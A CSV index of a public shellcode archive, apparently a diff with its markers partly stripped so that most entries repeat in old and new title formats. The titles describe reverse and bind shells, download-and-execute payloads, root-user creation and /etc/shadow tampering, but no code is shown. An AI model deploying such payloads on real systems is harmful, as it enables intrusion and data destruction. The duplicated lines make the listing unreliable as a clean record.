13502,shellcodes/solaris_x86/13502.txt,"Solaris/x86 - inetd Add Service + execve() Shellcode (201 bytes)",2004-09-26,anonymous,shellcode,solaris_x86
13503,shellcodes/unixware/13503.txt,"UnixWare - execve(/bin/sh) Shellcode (95 bytes)",2004-09-26,K2,shellcode,unixware
13504,shellcodes/windows_x86/13504.asm,"Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
13505,shellcodes/windows_x86/13505.c,"Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
13507,shellcodes/windows_x86/13507.txt,"Windows x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
13508,shellcodes/windows_x86/13508.asm,"Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86
13509,shellcodes/windows_x86/13509.c,"Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,windows_x86
13510,shellcodes/windows_x86/13510.c,"Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,windows_x86
13511,shellcodes/windows_x86/13511.c,"Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86
13512,shellcodes/windows_x86/13512.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13513,shellcodes/windows_x86/13513.c,"Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13514,shellcodes/windows_x86/13514.asm,"Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
13515,shellcodes/generator/13515.pl,"Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
13516,shellcodes/windows_x86/13516.asm,"Windows x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86
13517,shellcodes/windows_x86/13517.asm,"Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86
13518,shellcodes/windows_x86/13518.c,"Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,shellcode,windows_x86
13519,shellcodes/windows_x86/13519.c,"Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)",2006-04-14,xnull,shellcode,windows_x86
13520,shellcodes/windows_x86/13520.c,"Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,shellcode,windows_x86
13521,shellcodes/windows_x86/13521.asm,"Windows x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,shellcode,windows_x86
13522,shellcodes/windows_x86/13522.c,"Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,shellcode,windows_x86
13523,shellcodes/windows_x86/13523.c,"Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,shellcode,windows_x86
13524,shellcodes/windows_x86/13524.txt,"Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",shellcode,windows_x86
13525,shellcodes/windows_x86/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86
13526,shellcodes/windows_x86/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86
13527,shellcodes/windows_x86/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86
13528,shellcodes/generator/13528.c,"Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
13529,shellcodes/windows_x86/13529.c,"Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86
13530,shellcodes/windows_x86/13530.asm,"Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
13531,shellcodes/windows_x86/13531.c,"Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
13504,shellcodes/windows_x86/13504.asm,"Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode",2009-07-27,Skylined,shellcode,windows_x86
13505,shellcodes/windows_x86/13505.c,"Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)",2009-07-17,Stack,shellcode,windows_x86
13507,shellcodes/windows_x86/13507.txt,"Windows/x86 - Egg Omelet SEH Shellcode",2009-03-16,Skylined,shellcode,windows_x86
13508,shellcodes/windows_x86/13508.asm,"Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)",2009-02-27,DATA_SNIPER,shellcode,windows_x86
13509,shellcodes/windows_x86/13509.c,"Windows/x86 - PEB!NtGlobalFlags Shellcode (14 bytes)",2009-02-24,Koshi,shellcode,windows_x86
13510,shellcodes/windows_x86/13510.c,"Windows/x86 (XP SP2) (French) - cmd.exe Shellcode (32 bytes)",2009-02-20,Stack,shellcode,windows_x86
13511,shellcodes/windows_x86/13511.c,"Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,shellcode,windows_x86
13512,shellcodes/windows_x86/13512.c,"Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13513,shellcodes/windows_x86/13513.c,"Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes)",2008-09-03,Koshi,shellcode,windows_x86
13514,shellcodes/windows_x86/13514.asm,"Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode",2008-08-25,loco,shellcode,windows_x86
13515,shellcodes/generator/13515.pl,"Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)",2008-03-14,"YAG KOHHA",shellcode,generator
13516,shellcodes/windows_x86/13516.asm,"Windows/x86 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,shellcode,windows_x86
13517,shellcodes/windows_x86/13517.asm,"Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)",2007-06-14,Weiss,shellcode,windows_x86
13518,shellcodes/windows_x86/13518.c,"Windows/x86 (NT/XP) - IsDebuggerPresent Shellcode (39 bytes)",2007-05-31,ex-pb,shellcode,windows_x86
13519,shellcodes/windows_x86/13519.c,"Windows/x86 (SP1/SP2) - Beep Shellcode (35 bytes)",2006-04-14,xnull,shellcode,windows_x86
13520,shellcodes/windows_x86/13520.c,"Windows/x86 (XP SP2) - MessageBox Shellcode (110 bytes)",2006-01-24,Omega7,shellcode,windows_x86
13521,shellcodes/windows_x86/13521.asm,"Windows/x86 - Command WinExec() Shellcode (104+ bytes)",2006-01-24,Weiss,shellcode,windows_x86
13522,shellcodes/windows_x86/13522.c,"Windows/x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)",2005-12-23,darkeagle,shellcode,windows_x86
13523,shellcodes/windows_x86/13523.c,"Windows (NT/2000/XP) (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)",2005-10-28,darkeagle,shellcode,windows_x86
13524,shellcodes/windows_x86/13524.txt,"Windows (9x/NT/2000/XP) - Reverse Generic Without Loader (192.168.1.11:4919) Shellcode (249 bytes)",2005-08-16,"Matthieu Suiche",shellcode,windows_x86
13525,shellcodes/windows_x86/13525.c,"Windows (9x/NT/2000/XP) - PEB method Shellcode (29 bytes)",2005-07-26,loco,shellcode,windows_x86
13526,shellcodes/windows_x86/13526.c,"Windows (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)",2005-01-26,twoci,shellcode,windows_x86
13527,shellcodes/windows_x86/13527.c,"Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes)",2005-01-09,oc192,shellcode,windows_x86
13528,shellcodes/generator/13528.c,"Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)",2004-10-25,lion,shellcode,generator
13529,shellcodes/windows_x86/13529.c,"Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)",2004-10-25,lion,shellcode,windows_x86
13530,shellcodes/windows_x86/13530.asm,"Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode",2004-09-26,"Peter Winter-Smith",shellcode,windows_x86
13531,shellcodes/windows_x86/13531.c,"Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)",2004-09-26,silicon,shellcode,windows_x86
13532,shellcodes/windows_x86/13532.asm,"Windows - DCOM RPC2 Universal Shellcode",2003-10-09,anonymous,shellcode,windows_x86
13533,shellcodes/windows_x86-64/13533.asm,"Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
13533,shellcodes/windows_x86-64/13533.asm,"Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)",2006-08-07,Weiss,shellcode,windows_x86-64
13548,shellcodes/linux_x86/13548.asm,"Linux/x86 - Kill All Processes Shellcode (9 bytes)",2010-01-14,root@thegibson,shellcode,linux_x86
13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13549,shellcodes/linux_x86/13549.c,"Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13550,shellcodes/linux_x86/13550.c,"Linux/x86 - setuid(0) + /bin/cat /etc/shadow Shellcode (49 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13551,shellcodes/linux_x86/13551.c,"Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (33 bytes)",2009-12-04,ka0x,shellcode,linux_x86
13553,shellcodes/linux_x86/13553.c,"Linux/x86 - execve() Shellcode (51 bytes)",2009-12-04,"fl0 fl0w",shellcode,linux_x86
13560,shellcodes/windows/13560.txt,"Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows
13560,shellcodes/windows/13560.txt,"Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)",2009-12-14,anonymous,shellcode,windows
13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,shellcode,linux_x86
13565,shellcodes/windows_x86/13565.asm,"Windows XP SP3 x86 - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
13569,shellcodes/windows_x86/13569.asm,"Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
13565,shellcodes/windows_x86/13565.asm,"Windows/x86 (XP SP3) - ShellExecuteA Shellcode",2009-12-19,sinn3r,shellcode,windows_x86
13566,shellcodes/linux_x86/13566.c,"Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode",2009-12-19,mr_me,shellcode,linux_x86
13569,shellcodes/windows_x86/13569.asm,"Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode",2009-12-24,sinn3r,shellcode,windows_x86
13570,shellcodes/freebsd_x86/13570.c,"FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)",2009-12-24,sbz,shellcode,freebsd_x86
13571,shellcodes/windows_x86/13571.c,"Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86
13571,shellcodes/windows_x86/13571.c,"Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes)",2009-12-24,Stack,shellcode,windows_x86
13572,shellcodes/linux_x86/13572.c,"Linux/x86 - unlink(/etc/passwd) + exit() Shellcode (35 bytes)",2009-12-24,$andman,shellcode,linux_x86
13574,shellcodes/windows_x86/13574.c,"Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
13574,shellcodes/windows_x86/13574.c,"Windows/x86 (XP SP2) (English / Arabic) - cmd.exe Shellcode (23 bytes)",2009-12-28,"AnTi SeCuRe",shellcode,windows_x86
13576,shellcodes/linux_x86/13576.asm,"Linux/x86 - chmod 666 /etc/shadow Shellcode (27 bytes)",2010-01-16,root@thegibson,shellcode,linux_x86
13577,shellcodes/linux_x86/13577.txt,"Linux/x86 - setuid() + Break chroot (mkdir/chdir/chroot '...') + execve(/bin/sh) Shellcode (79 bytes)",2009-12-30,root@thegibson,shellcode,linux_x86
13578,shellcodes/linux_x86/13578.txt,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (1)",2009-12-30,root@thegibson,shellcode,linux_x86
13579,shellcodes/linux_x86/13579.c,"Linux/x86 - Add Root User (toor) To /etc/passwd + No password + exit() Shellcode (107 bytes)",2009-12-31,$andman,shellcode,linux_x86
13581,shellcodes/windows/13581.txt,"Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
13582,shellcodes/windows/13582.txt,"Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
13581,shellcodes/windows/13581.txt,"Windows (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)",2010-01-03,Aodrulez,shellcode,windows
13582,shellcodes/windows/13582.txt,"Windows (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes)",2010-01-03,Aodrulez,shellcode,windows
13586,shellcodes/linux_x86/13586.txt,"Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)",2010-01-08,root@thegibson,shellcode,linux_x86
13595,shellcodes/windows_x86/13595.c,"Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86
13595,shellcodes/windows_x86/13595.c,"Windows/x86 (XP SP2) (French) - calc Shellcode (19 bytes)",2010-01-20,SkuLL-HackeR,shellcode,windows_x86
13599,shellcodes/linux_x86/13599.txt,"Linux/x86 - ip6tables -F + Polymorphic Shellcode (71 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13600,shellcodes/linux_x86/13600.txt,"Linux/x86 - ip6tables -F Shellcode (47 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13601,shellcodes/linux_x86/13601.txt,"Linux/i686 - pacman -S <package> (default package: backdoor) Shellcode (64 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13602,shellcodes/linux_x86/13602.txt,"Linux/i686 - pacman -R <package> Shellcode (59 bytes)",2010-01-24,"Jonathan Salwan",shellcode,linux_x86
13609,shellcodes/linux_x86/13609.c,"Linux/x86 - execve(/bin/cat /etc/passwd) Shellcode (43 bytes)",2010-02-09,fb1h2s,shellcode,linux_x86
13614,shellcodes/windows_x86/13614.c,"Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
13615,shellcodes/windows_x86/13615.c,"Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
13614,shellcodes/windows_x86/13614.c,"Windows/x86 (XP SP3) (English) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
13615,shellcodes/windows_x86/13615.c,"Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)",2010-02-10,"Hellcode Research",shellcode,windows_x86
13627,shellcodes/linux_x86/13627.c,"Linux/x86 - execve(/bin/sh) Shellcode (8 bytes)",2010-02-23,"JungHoon Shin",shellcode,linux_x86
13628,shellcodes/linux_x86/13628.c,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (2)",2010-02-27,ipv,shellcode,linux_x86
13630,shellcodes/windows_x86/13630.c,"Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86
13631,shellcodes/windows_x86/13631.c,"Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86
13630,shellcodes/windows_x86/13630.c,"Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes)",2010-02-28,"Hazem mofeed",shellcode,windows_x86
13631,shellcodes/windows_x86/13631.c,"Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes)",2010-03-01,"Hazem mofeed",shellcode,windows_x86
13632,shellcodes/linux_x86/13632.c,"Linux/x86 - Disable modsecurity Shellcode (64 bytes)",2010-03-04,sekfault,shellcode,linux_x86
13635,shellcodes/windows_x86/13635.txt,"Windows x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86
13636,shellcodes/windows_x86/13636.c,"Windows x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,windows_x86
13639,shellcodes/windows_x86/13639.c,"Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,windows_x86
13642,shellcodes/windows_x86/13642.txt,"Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
13645,shellcodes/windows/13645.c,"Windows - Egghunter JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows
13647,shellcodes/windows_x86/13647.txt,"Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
13648,shellcodes/windows_x86/13648.rb,"Windows x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
13649,shellcodes/windows/13649.txt,"Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
13635,shellcodes/windows_x86/13635.txt,"Windows/x86 - JITed Stage-0 Shellcode",2010-03-07,"Alexey Sintsov",shellcode,windows_x86
13636,shellcodes/windows_x86/13636.c,"Windows/x86 - JITed exec notepad Shellcode",2010-03-08,"Alexey Sintsov",shellcode,windows_x86
13639,shellcodes/windows_x86/13639.c,"Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)",2010-03-11,Stoke,shellcode,windows_x86
13642,shellcodes/windows_x86/13642.txt,"Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes)",2010-03-18,czy,shellcode,windows_x86
13645,shellcodes/windows/13645.c,"Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode",2010-03-20,"Alexey Sintsov",shellcode,windows
13647,shellcodes/windows_x86/13647.txt,"Windows/x86 (XP SP3) (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)",2010-03-24,"lord Kelvin",shellcode,windows_x86
13648,shellcodes/windows_x86/13648.rb,"Windows/x86 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,shellcode,windows_x86
13649,shellcodes/windows/13649.txt,"Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode",2010-03-27,"Alexey Sintsov",shellcode,windows
13661,shellcodes/linux_x86/13661.txt,"Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode",2010-04-02,anonymous,shellcode,linux_x86
13669,shellcodes/linux_x86/13669.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)",2010-04-14,Magnefikko,shellcode,linux_x86
13670,shellcodes/linux_x86/13670.c,"Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13671,shellcodes/linux_x86/13671.c,"Linux/x86 - DoS Badger Game Shellcode (6 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13673,shellcodes/linux_x86/13673.c,"Linux/x86 - DoS SLoc Shellcode (55 bytes)",2010-04-14,Magnefikko,shellcode,linux_x86
13675,shellcodes/linux_x86/13675.c,"Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,linux_x86
13675,shellcodes/linux_x86/13675.c,"Linux/x86 - execve(a->/bin/sh) + Local-only Shellcode (14 bytes)",2010-04-17,Magnefikko,shellcode,linux_x86
13676,shellcodes/linux_x86/13676.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)",2010-04-18,sm0k,shellcode,linux_x86
13677,shellcodes/linux_x86/13677.c,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (29 bytes)",2010-04-19,Magnefikko,shellcode,linux_x86
13679,shellcodes/generator/13679.py,"Linux - write() + exit(0) Shellcode (Generator)",2010-04-20,Stoke,shellcode,generator
13680,shellcodes/linux_x86/13680.c,"Linux/x86 - Fork Bomb + Polymorphic Shellcode (30 bytes)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
13681,shellcodes/linux_x86/13681.c,"Linux/x86 - Fork Bomb Shellcode (6 bytes) (2)",2010-04-21,"Jonathan Salwan",shellcode,linux_x86
13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86
13682,shellcodes/linux_x86/13682.c,"Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes)",2010-04-22,Magnefikko,shellcode,linux_x86
13688,shellcodes/linux_x86-64/13688.c,"Linux/x86-64 - reboot(POWER_OFF) Shellcode (19 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13691,shellcodes/linux_x86-64/13691.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)",2010-04-25,zbt,shellcode,linux_x86-64
13692,shellcodes/linux_x86/13692.c,"Linux/x86 - Sends 'Phuck3d!' To All Terminals Shellcode (60 bytes)",2010-04-25,condis,shellcode,linux_x86
13697,shellcodes/linux_x86/13697.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) Shellcode (33 bytes)",2010-05-04,"Jonathan Salwan",shellcode,linux_x86
13698,shellcodes/linux_x86/13698.c,"Linux/x86 - execve(_/bin/bash___-p__NULL) + Polymorphic Shellcode (57 bytes)",2010-05-05,"Jonathan Salwan",shellcode,linux_x86
13699,shellcodes/windows_x86/13699.txt,"Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86
13699,shellcodes/windows_x86/13699.txt,"Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode",2010-05-10,Crack_MaN,shellcode,windows_x86
13702,shellcodes/linux_x86/13702.c,"Linux/x86 - execve(_/usr/bin/wget__ _aaaa_) Shellcode (42 bytes)",2010-05-17,"Jonathan Salwan",shellcode,linux_x86
13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13703,shellcodes/linux_x86/13703.txt,"Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13704,shellcodes/solaris_x86/13704.c,"Solaris/x86 - execve(_/bin/sh___/bin/sh__NULL) Shellcode (27 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
13707,shellcodes/solaris_x86/13707.c,"Solaris/x86 - Halt Shellcode (36 bytes)",2010-05-20,"Jonathan Salwan",shellcode,solaris_x86
13709,shellcodes/solaris_x86/13709.c,"Solaris/x86 - Reboot() Shellcode (37 bytes)",2010-05-21,"Jonathan Salwan",shellcode,solaris_x86
@ -357,15 +357,15 @@ id,file,description,date,author,type,platform
13712,shellcodes/linux_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",shellcode,linux_x86
13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86
13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86
13719,shellcodes/windows_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
13719,shellcodes/windows_x86-64/13719.txt,"Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86
13723,shellcodes/linux_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13723,shellcodes/linux_x86/13723.c,"Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13724,shellcodes/linux_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13728,shellcodes/linux_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
13729,shellcodes/windows_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13728,shellcodes/linux_x86/13728.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
13729,shellcodes/windows_x86-64/13729.txt,"Windows/x86-64 (7) - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
13732,shellcodes/linux_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",shellcode,solaris
@ -377,8 +377,8 @@ id,file,description,date,author,type,platform
13908,shellcodes/linux_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
13915,shellcodes/linux_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
